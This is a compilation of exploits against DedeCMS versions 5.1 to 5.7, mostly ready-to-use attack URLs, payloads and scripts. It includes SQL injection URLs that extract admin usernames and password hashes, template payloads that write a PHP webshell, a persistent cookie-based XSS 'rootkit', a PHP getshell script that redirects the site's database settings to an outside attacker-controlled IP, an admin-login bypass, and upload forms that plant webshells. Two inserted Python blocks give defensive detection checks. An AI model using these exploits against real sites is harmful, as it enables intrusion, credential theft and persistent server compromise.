Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After it is published, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant generates x.php with password xiao, writing a one-line shell directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions: gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser and visit it; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. No matter how any of the URLs below is then visited, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 privilege bypass vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you are taken straight into the site backend.
This only works if the backend path is already known.

Dedecms (织梦) tag remote file write vulnerability
Prerequisite: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit the form below; the shell is 1.php in the same directory. Work out the mechanics yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
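
The variable-overwrite script above, the login.php backend bypass and the mytag_js.php form all depend on one weakness: request keys such as _COOKIE[GLOBALS][cfg_dbhost] or _POST[GLOBALS][cfg_dbhost] are registered as variables and replace the site's database settings, so the application connects to a database the attacker controls. As an added defensive example (not code from this page or from DedeCMS), the Python below parses PHP-style bracketed parameter names, reports any whose path touches a reserved prefix (the prefix list is an assumption modelled on the check DedeCMS later added), and runs the same rule over access-log lines; LOG_RE, SAMPLE_LOG and SAMPLE_POST_BODY are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Request keys that must never become variable names: the site's cfg_* settings,
# the GLOBALS array and the PHP superglobals. The list is an assumption modelled
# on the prefix check DedeCMS later added to its request handling.
RESERVED_PREFIXES = ("cfg_", "GLOBALS", "_GET", "_POST", "_COOKIE", "_SERVER", "_SESSION")

# "_COOKIE[GLOBALS][cfg_dbhost]" -> base "_COOKIE" plus indices "[GLOBALS][cfg_dbhost]"
PHP_KEY_RE = re.compile(r"^([^\[]+)((?:\[[^\]]*\])*)$")

def split_php_key(raw_key):
    """Split a PHP-style bracketed parameter name into its path components.

    PHP turns a[b][c]=v into $a['b']['c']; code that registers every request
    key as a variable then lets $_COOKIE['GLOBALS']['cfg_dbhost'] overwrite
    $GLOBALS['cfg_dbhost'], which is what the three PoCs above rely on.
    """
    m = PHP_KEY_RE.match(raw_key)
    if not m:
        return [raw_key]
    return [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))

def parse_form(encoded):
    """Decode a query string or x-www-form-urlencoded body into (key path, value) pairs."""
    pairs = []
    for field in encoded.split("&"):
        if field:
            key, _, value = field.partition("=")
            pairs.append((split_php_key(unquote_plus(key)), unquote_plus(value)))
    return pairs

def find_reserved_keys(encoded):
    """Return reserved parameter names; a non-empty result means refuse the request."""
    hits = []
    for path, _ in parse_form(encoded):
        if any(part.startswith(RESERVED_PREFIXES) for part in path):
            hits.append(path[0] + "".join("[%s]" % p for p in path[1:]))
    return hits

# Common/combined log format: client, request line, status (constructed regex).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')

def scan_access_log(lines):
    """Flag logged requests whose query string carries reserved keys.

    Only the GET variant (as in the login.php bypass URL) is visible in an
    access log; cookie and POST-body variants need a WAF or the check above.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        hits = find_reserved_keys(query)
        if hits:
            findings.append({"client": client, "path": path, "status": status, "keys": hits})
    return findings

# Constructed sample data; addresses are documentation ranges, not real hosts.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2011:13:55:36 +0800] "GET /dede/login.php?dopost=login&userid=admin'
    '&pwd=x&_POST[GLOBALS][cfg_dbhost]=198.51.100.9&_POST[GLOBALS][cfg_dbuser]=root HTTP/1.1" 200 512',
    '203.0.113.8 - - [10/Oct/2011:13:56:01 +0800] "GET /plus/list.php?tid=3&PageNo=2 HTTP/1.1" 200 8812',
]
SAMPLE_POST_BODY = ("doaction=http%3A%2F%2Fexample.invalid%2Fplus%2Fmytag_js.php%3Faid%3D1"
                    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=198.51.100.9&nocache=true")

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
    print("POST body reserved keys:", find_reserved_keys(SAMPLE_POST_BODY))
```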

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member area, publish an article and upload an image. Then, in attachment management, replace the image with our crafted template; say the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(this is the part we construct)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS site management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Construct the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
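
Both template-execution write-ups above (the V5.6 Final one and the 5.3/5.6 Get Shell one) follow the same path: a text file with a Gif89a prefix and a runphp='yes' tag is uploaded as an image, then templet is pointed at it through dede_addonfields so the article is rendered with that file as its template. As an added defensive example (not code from this page or from DedeCMS), the Python below shows the two server-side checks that break that chain: a byte-exact image signature check plus a scan for code-executing template tags at upload time, and a template path check that only accepts .htm files that stay inside the templates directory. The /templets root, the .htm requirement and the tag patterns are assumptions; POLYGLOT is the sample file from the page, PIXEL_GIF and PHP_FILE are constructed.

```python
import posixpath
import re

# Tags that hand template content to the PHP interpreter: {dede:php}...{/dede:php},
# any {dede:...} tag carrying runphp='yes', and raw PHP open tags. The patterns
# are modelled on the tags used in the write-ups above, not on a full grammar of
# DedeCMS template syntax (assumption).
PHP_TAG_RE = re.compile(
    rb"\{dede:php[\s}]|\{dede:\w+[^}]*runphp\s*=\s*['\"]yes['\"]|<\?php|<\?=",
    re.IGNORECASE,
)

# Byte-exact file signatures. A strict comparison is deliberate: the PoC file
# starts with "Gif89a", which only passes a case-insensitive or substring check.
IMAGE_MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}

def scan_upload(filename, data):
    """Return the reasons an uploaded 'image' must be rejected; [] means clean."""
    reasons = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    magics = IMAGE_MAGIC.get(ext)
    if magics is None:
        reasons.append("extension not an allowed image type")
    elif not data.startswith(magics):
        reasons.append("content does not carry a valid image signature")
    if PHP_TAG_RE.search(data):
        reasons.append("contains a code-executing template tag or PHP open tag")
    return reasons

def template_path_is_safe(templet, templets_root="/templets"):
    """Accept only a .htm template that resolves inside the templates directory.

    The write-ups set templet=../uploads/userup/3/1.gif so the article is
    rendered with a member-uploaded file as its template; normalising the path
    and requiring it to stay under templets_root rejects that. The root path
    and the .htm requirement are assumptions about the deployment.
    """
    if not templet or "\x00" in templet or "\\" in templet:
        return False
    full = posixpath.normpath(posixpath.join(templets_root, templet))
    inside = full.startswith(templets_root.rstrip("/") + "/")
    return inside and full.endswith(".htm")

# Constructed samples: POLYGLOT is the file from the Get Shell write-up above,
# PIXEL_GIF a minimal real 1x1 GIF, PHP_FILE a bare script renamed as an image.
POLYGLOT = b"Gif89a{dede:field name='toby57' runphp='yes'}\nphpinfo();\n{/dede:field}\n"
PIXEL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00"
             b"\x02\x02D\x01\x00;")
PHP_FILE = b"<?php phpinfo(); ?>"

if __name__ == "__main__":
    for name, blob in (("1.gif", POLYGLOT), ("pixel.gif", PIXEL_GIF), ("1.jpg", PHP_FILE)):
        print(name, scan_upload(name, blob) or "clean")
    for path in ("article_article.htm", "../uploads/userup/3/1.gif"):
        print(path, template_path_is_safe(path))
```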

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5 value; from that, drop 3 more at the front and 1 at the end to get a 16-character MD5.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
This exploits the error raised by a MySQL numeric field overflow, together with the fact that DEDECMS records database error messages with PHP into a file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is displayed.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After clicking OK, seeing the output from step 2 means the trojan file was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*